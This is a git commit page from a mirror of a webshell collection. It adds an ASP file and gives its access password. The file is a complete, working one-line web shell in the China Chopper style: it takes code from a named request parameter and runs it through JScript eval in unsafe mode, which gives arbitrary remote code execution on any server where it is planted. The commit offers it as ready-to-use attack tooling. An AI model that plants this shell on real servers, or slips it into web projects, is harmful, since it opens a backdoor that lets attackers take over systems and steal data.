mirror of
https://github.com/tennc/webshell
synced 2024-11-22 03:03:03 +00:00
Create w01.asp
password : hxg
This commit is contained in:
parent
0871e1a18c
commit
8b3b5d0a20
1 changed files with 6 additions and 0 deletions
6
caidao-shell/w01.asp
Normal file
6
caidao-shell/w01.asp
Normal file
|
@ -0,0 +1,6 @@
|
|||
<%@ Page Language="Jscript" validateRequest="false" %>
|
||||
<%
|
||||
var keng
|
||||
keng = Request.Item["hxg"];
|
||||
Response.Write(eval(keng,"unsafe"));
|
||||
%>
|
Loading…
Reference in a new issue